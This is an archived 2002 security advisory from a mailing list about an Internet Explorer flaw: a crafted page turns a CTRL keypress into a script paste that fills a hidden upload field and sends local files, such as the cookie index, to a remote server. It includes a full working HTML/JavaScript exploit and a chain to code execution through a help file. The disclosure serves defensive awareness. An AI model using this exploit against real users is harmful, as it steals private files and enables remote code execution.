[NT] Why Pressing CTRL in IE is Dangerous
From: support@securiteam.comDate: 07/24/02
- Previous message: support@securiteam.com: "[TOOL] Tiny Honeypot"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 24 Jul 2002 10:58:34 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Why Pressing CTRL in IE is Dangerous
------------------------------------------------------------------------
SUMMARY
Pressing CTRL in IE may result in arbitrary local file to be uploaded to a
remote server (no exact path needed). If special sensitive information is
uploaded, it may be used to run remote programs.
DETAILS
A special crafted webpage can retrieve any local file using simple
JavaScript. This is possible by performing the following steps:
1. When a user presses the CTRL key an OnKeydown event can be set to fire.
In the event function the key pressed is changed to 'V'. The result will
be a paste operation with fewer restrictions.
2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into the
form, yielding a change of value for the file upload field (not normally
allowed).
3. The upload form is submitted automatically (legal JavaScript
operation).
It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".
Further on, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, then the random directories needed to get the exact path to
the temporarily internet folders can be retrieved. Knowing the exact path
a compiled help file .chm can be dumped and launched with showHelp() (old
chm attack). The compiled help file is allowed to have instructions to
execute arbitrary programs.
Vendor status:
02-06-16
Microsoft was contacted about the issue.
02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."
They proposed the following possible workarounds:
1. Disable or set to prompt - "Submit non encrypted form data" option
2. Disable "allow paste operations via script" (best)
3. Disable active scripting
Exploit:
Instructions:
Put the html code in a remote html document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a server
side script to take care of the upload process ("upload.php"). If you
choose to use PHP we recommend
<http://www.php.net/manual/en/features.file-upload.php>
http://www.php.net/manual/en/features.file-upload.php as a reference on
how to setup a server side script taking care of a file upload.
Note:
1. Please remove all "!" characters in the exploit code. They have been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.
Exploit code:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------
ADDITIONAL INFORMATION
The information has been provided by <mailto:sandblad@acc.umu.se> Andreas
Sandblad.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] Tiny Honeypot"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
